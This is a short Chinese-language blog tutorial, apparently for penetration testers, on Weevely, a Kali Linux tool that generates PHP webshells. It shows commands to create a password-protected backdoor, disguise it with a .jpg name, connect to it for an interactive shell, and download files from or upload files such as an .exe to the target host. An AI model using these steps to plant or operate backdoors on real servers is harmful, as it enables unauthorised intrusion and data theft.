Posts Tags About

目錄

工具介紹-Weevely (kali linux web shell產生工具)

   約 355 字   預計閱讀 1 分鐘 

Weevely是使用python寫成的webshell管理工具,可產生php webshell。

產生Webshell

使用以下指令產生webshell,要注意密碼用特殊字元有時會造成連線失敗。

如果要產生圖片檔,以jpg命名結尾就可以了。

weevely generate 567 hello.php

https://amingosec.blog/wp-content/uploads/2022/02/weevely_generate_php.png?w=505

連線Webshell

上傳後使用以下指令連線後門,然後進入一個互動式的shell

weevely http://urltowebshell/hello.php 567

https://amingosec.blog/wp-content/uploads/2022/02/weevely_connection_php.png?w=639

如果是使用jpg的檔案,一樣直接連線該檔案就行。

https://amingosec.blog/wp-content/uploads/2022/02/weevely_connection_jpg.png?w=617

利用Webshell下載檔案

從遠端下載檔案,rpath是遠端路行 lpath是要存的本地路徑(都要包含檔名)

file.download rpath lpath [-vector]

利用Webshell上傳檔案

使用:file_upload2web指令可以檔案上傳到目標主機

:file_upload2web lpath rpath

:file\_upload2web /home/kali/Desktop/test.exe test.exe

https://amingosec.blog/wp-content/uploads/2022/02/weevely_upload_exe.png?w=800

延伸閱讀

參考資料

更新於 2022-02-07
 Kali Linuxwebshell滲透測試
返回 | 主頁